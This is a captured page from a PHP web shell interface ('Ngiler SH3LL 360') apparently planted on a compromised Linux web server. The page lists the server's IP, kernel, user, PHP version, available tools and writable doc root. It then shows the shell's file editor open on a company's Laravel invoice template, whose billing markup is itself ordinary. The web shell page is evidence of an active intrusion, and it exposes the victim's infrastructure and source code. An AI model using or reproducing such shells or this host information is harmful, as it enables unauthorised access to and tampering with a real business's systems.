Ngiler SH3LL 360
Home
Information
Create File
Create Folder
:
/
home
/
tbf
/
cursbackend
/
resources
/
views
/
invoices
/
Information Server
MySQL :
OFF
Perl :
OFF
CURL :
ON
WGET :
OFF
PKEXEC :
OFF
Directive
Local Value
IP Address
89.40.16.97
System
Linux server.atelieruldeit.ro 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
User
tbf
PHP Version
7.3.33
Software
Apache
Doc root
Writable
close
Edit File :
invoice_euro.blade.php
| Size :
4.48
KB
Copy
<table> <tr> @if(Carbon\Carbon::parse($invoice->created_at) < Carbon\Carbon::parse("2019-12-01")) <td style=" width:70%;"> <span>S.C. TBF CORE S.R.L.</span> <strong>CIF:</strong> RO 41257754<br /> <strong>Reg. Com.:</strong> J23/2632/2019<br /> <strong>Adresa:</strong> Bld. Pipera nr 1-IA, Voluntari, Ilfov<br /> <strong>Email:</strong> contact@tbf.ro<br /> </td> <td style="width: 30%; text-align:right;"> <img src="{{config('app.url')}}/build/images/logo-white-dark.png" style="width:40px;" /> </td> @else <td style=" width:60%;"> <span>S.C. TBF DIGITAL S.R.L.</span> <strong>ID:</strong> J23/2632/2019<br /> <strong>VAT NO:</strong> RO 41257754<br /> <strong>Address:</strong> Bulevardul Pipera nr 1-IA, Voluntari, Ilfov, Romania<br /> </td> <td style="width: 40%; text-align:right;"> <img src="{{config('app.url')}}/build/images/logo_tbf.png" style="width:210px;" /> </td> @endif </tr> </table> <div class="divider"></div> <table> <tr> <td style="width: 50%;"> Document<br /> <span>INVOICE</span> <strong>Date:</strong> {{Carbon\Carbon::parse($invoice->created_at)->formatLocalized('%Y-%m-%e')}}<br /> <strong>Series and Number:</strong> {{$invoice->series."-".$invoice->number}}<br /> <strong>Currency:</strong> {{$invoice->currency}} </td> <td style="width: 50%;"> Client<br /> <span>{{ $invoice->company_name != null ? $invoice->company_name : $invoice->billing_name }}</span> @if($invoice->cnp != null) <strong>CLIENT ID:</strong> {{$invoice->cnp}}<br /> @endif @if($invoice->reg_number != null) <strong>Client ID:</strong> {{$invoice->reg_number}}<br /> @endif <strong>Address:</strong> {{$invoice->address}}, {{$invoice->city}}, {{ $invoice->instance->country }}<br /> </td> </tr> </table> <table class="fact"> <tr class="fact-head"> <td style="width:210px;">Item description</td> <td style="width:30px;">U.M.</td> <td style="width:25px;">Qty</td> <td style="width:90px;">Unit Price</td> <td style="width:90px;">VAT Value 19%</td> <td style="width:90px;">Total</td> </tr> <tr> <td> {{ $invoice->instance->package->name }} </td> <td>month</td> <td style="text-align:right;">1</td> <?php $price_without_vta = round(($invoice->amount/1.19),2); ?> <?php $vat = round(($invoice->amount - $price_without_vta),2); ?> <?php $total_amount = number_format(round($invoice->amount, 2), 2, ',', '.'); ?> <td style="text-align:right;">{{ number_format($price_without_vta, 2, ',', '.') }}</td> <td style="text-align:right;">{{ number_format($vat, 2, ',', '.') }}</td> <td style="text-align:right;">{{ $total_amount }}</td> </tr> <tr class="fact-foot"> <td colspan="5">Total amount for current invoice</td> <td style="text-align:right; font-weight: bold;"> {{ $total_amount }} </td> </tr> <tr class="fact-foot"> <td colspan="3" style="font-size: 10px;"> Sume in RON (curs BNR {{Carbon\Carbon::parse($invoice->created_at)->formatLocalized('%Y-%m-%e')}} - 1 EUR - {{$invoice->exchange_value}} RON) </td> <?php $price_without_vta = round((($invoice->amount) * $invoice->exchange_value)/1.19,2); ?> <?php $vat = round((($invoice->amount * $invoice->exchange_value) - $price_without_vta),2); ?> <?php $total_amount = number_format(round($invoice->amount * $invoice->exchange_value, 2), 2, ',', '.'); ?> <td style="font-size: 10px;text-align:center;">{{ number_format($price_without_vta, 2, ',', '.') }} Lei</td> <td style="font-size: 10px;text-align:center;">{{ number_format($vat, 2, ',', '.') }} Lei</td> <td style="font-size: 10px;text-align:center;">{{ $total_amount }} Lei</td> </tr> </table> <table style="width: 100%;border: 0px;"> <tr> <td style="text-align: right;">DO NOT PAY - Charged to card on file</td> </tr> </table> <div class="footer"> <span>THANK YOU</span> Stay unreasonable, The Basic Fundamentals<br /> contact@40q.io<br /><br > @if(Auth::user() && Auth::user()->role == 'super_admin') <br> <br> ID detinator cont 40q <strong>{{$invoice->instance->users->first()->surname}} {{$invoice->instance->users->first()->name}}, {{$invoice->instance->users->first()->email}}</strong> <br> @if($invoice->instance->partner) Cod: <strong>{{ $invoice->instance->partner->code }}</strong> @endif @endif </div>
Back